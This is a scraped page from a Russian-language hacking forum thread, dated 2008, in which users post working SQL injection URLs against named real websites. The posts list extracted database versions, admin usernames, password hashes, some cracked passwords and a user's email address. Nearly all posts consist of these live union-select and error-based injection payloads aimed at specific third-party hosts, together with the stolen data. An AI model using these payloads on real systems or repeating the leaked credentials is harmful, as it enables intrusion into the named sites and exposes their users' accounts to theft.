ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5511  
Старый 22.05.2008, 19:48
†c0(aIn?†
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786

Репутация: 45
По умолчанию

Код:
http://www.globaleconomicgovernance.org/research.php?id=-1+union+select+1, concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7/*
version: 5.0.45 log
db name: db158065722
user: dbo158065722@212.227.118.42
 
Ответить с цитированием

  #5512  
Старый 22.05.2008, 20:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.landbigfish.com

Код:
http://www.landbigfish.com/tacklestore/showcase.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+AdminUsers)--
 
Ответить с цитированием

  #5513  
Старый 22.05.2008, 20:52
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

yamaha-service.de
Код:
http://www.yamaha-service.de/cat1.php?archivset=1&newsset=&idcat1=-1+union+select+all+1,username,3,password,5+from+users--
 
Ответить с цитированием

  #5514  
Старый 22.05.2008, 21:15
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

www.relevantmagazine.com
Код:
http://www.relevantmagazine.com/pc_article.php?id=-1+union+all+select+1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12,null,14,15,16,17,18,19,20+from+admin/*
 
Ответить с цитированием

  #5515  
Старый 22.05.2008, 22:03
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

rib-racers.com
Код:
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10/*
5.0.45-logribs@cgi1203.int.bizland.netribs
Код:
http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,fname,sname,username,password),3,4,5,6,7,8,9,10+from+reg/*
PeterJohnsonbloggs3823a5ee1f831626:peter
 
Ответить с цитированием

  #5516  
Старый 22.05.2008, 22:47
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию

Вот три хоста на одном сервере

binar-design.biz
Код:
http://binar-design.biz/web/index.php?idk=5-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203a20,TABLE_SCHEMA,TABLE_NAME)),4,5,6 FROM INFORMATION_SCHEMA.TABLES-- f
в бд никаких полезных таблиц нету



mobilka.com.ua
Код:
http://mobilka.com.ua/games/download.php?id=393-1 AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- d
полезная таблица user в ней столбцы id,login,pass но похоже она пустая =\


samba.org.ua
Код:
http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME)),4 FROM INFORMATION_SCHEMA.TABLES-- f
это уже интереснее, три таблицы с юзерами:
1)user пустая
2)sis_users вот отседа:
Код:
Guest : Guest : 
Petro : 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 (111)
Vlas : 011c945f30ce2cbafc452f39840f025693339c42 (1111)
3)users из этой таблицы:
Код:
Vlas : 2a062126ee92cb96a03bef1eb1008c4d (armagedon)
tema_c : 698d51a19d8a121ce581499d7b701668 (111)
Uncnovn : 3f230640b78d7e71ac5514e57935eb69 (qazxsw)
__________________
Кто я?..
 
Ответить с цитированием

  #5517  
Старый 23.05.2008, 01:14
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.ub.bw
Код:
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
root:*523D4E56011212768221213AC39698CEC334CD28
ubcms:3f29838236c2615f
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
webadmin:5c42f6195bd93698
mysql:*E74858DB86EBA20BC33D0AECAE8A8108C56B17FA
 
Ответить с цитированием

  #5518  
Старый 23.05.2008, 03:48
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

chtoikak.com
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
4.1.22-standardoptimasi_bw@localhostoptimasi_BeautyWorl d
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat(user,0x3,pass),3,4,5,6,7,8+from+users+limit+1,1/*
adminadmin ^^
Код:
http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,login,passw,email),3,4,5,6,7,8+from+reg+limit+1,1/*
vlapron260561954vlapron@bk.ru
 
Ответить с цитированием

  #5519  
Старый 23.05.2008, 16:01
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.mnsafetycouncil.org PR:5
Код:
http://www.mnsafetycouncil.org/products/product.cfm?PID=1+or+1=(SELECT+TOP+1+cast(LoginName+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+users)--
 
Ответить с цитированием

  #5520  
Старый 23.05.2008, 18:14
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Http://npo.karelia.ru/ скока не копался ничего кроме
Результаты поиска
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''''' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%'' at line 1

Вы искали - '''

Совпадений не найдено, попробуйте изменить искомое слово.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%' ORDER BY e_id DESC limit 0,15' at line 1
Может кто пограмотнее поможет!
А я так просто учусь.. пока мало чего понимаю. Может подскажите сайтик на котором попрактиковатся можно..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ